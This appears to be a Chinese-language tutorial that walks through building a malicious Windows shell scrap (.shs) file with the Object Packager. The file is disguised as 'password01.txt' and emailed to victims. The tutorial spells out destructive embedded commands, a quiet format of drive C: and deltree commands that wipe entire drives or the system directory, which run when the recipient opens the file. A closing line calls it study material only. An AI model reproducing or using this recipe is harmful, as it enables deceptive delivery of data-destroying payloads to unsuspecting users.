1.创建一个只包含一个空格
(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板
文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然
后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在
弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下
命令:start.exe /m FORMat c:/q /autotest /u ,点击“确定”,此时,内容栏中会
显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一
个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名
称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默
认名为"片段"),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面
上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作
为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前
文所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌
入对象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换
为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文
件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y
c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当
然大家可以改成其它的命令)
真的很简单,就这样一个恶意的攻击程序被弄出来了,太可怕了!
(切记:仅供学习与研究,切莫用来攻击他人,更不要在没有安全准备的情况下执行上
面的文件,呵呵!)